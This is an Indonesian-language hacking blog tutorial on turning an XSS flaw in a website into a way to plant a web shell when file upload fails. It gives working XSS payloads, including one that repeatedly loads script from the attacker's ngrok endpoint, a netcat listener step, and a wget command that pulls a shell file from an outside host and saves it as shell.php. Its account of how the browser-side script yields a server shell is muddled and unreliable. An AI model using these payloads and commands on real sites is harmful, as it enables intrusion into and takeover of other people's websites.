Alternatif Gagal Upload Shell Dengan XSS
Assalamualaikum,
Disini kami akan share cara agar bisa upload shell tanpa form upload pada webnya menggunakan vuln XSS , jadi jangan khawatir ya kalau memang gagal upload shell (ingat hanya yang vuln XSS)
gimana caranya ? yok simak
Bahan yang diperlukan
nah ini penting untuk diketahui yang diperlukan untuk exploit nya yaitu
- CMD atau bisa juga pakai Termux
- ngrok yang sudah terinstall
- netcat yang sudah terinstall
Exploit XSS
Nahh sebelum melakukan attack ini pastikan kalian memiliki website yang vuln XSS seperti ini
disitu pakai payload
<font onclick="prompt(1)">EvilTwinWasHere</font>
buat test doang hehehe
lanjut gan start ngrok dan netcat kalian
Setelah dah run kembali ke website tadi dan masukin payload ini sesuai TCP ngrok kalian ya
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//angka.tcp.ngrok.io:PORT"},999)>kalau sudah coba save dan lihat inspect element apakah GET tcp ngrok tadi , sambil mantau netcat kalian kalau berhasil hasil nya seperti ini
nahh kalau kalian ingin upload shell tinggal pakai command seperti berikut
wget https://eviltwin-dev.github.io/shell.txt shell.php
kalau ingin tau tempat shell nya tinggal pakai command
pwd
dan hasilnya seperti ini gan kalau berhasil
Akhir Kata
sebenarnya ini adalah tutorial DOM XSS to reverse shell / backconnect hehehe kita ambil simple nya saja dan nggk semua website bisa gini ya gan,terkadang waf,security pada server,Disable function layaknya shell_exec bisa menghalangi XSS attack kita untuk reverse shell seperti ini.
Oke sekian dan Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi kita manusia biasa.
Sampai jumpa di artikel selanjutnya, Semoga bermanfaat!
Wassalamualaikum
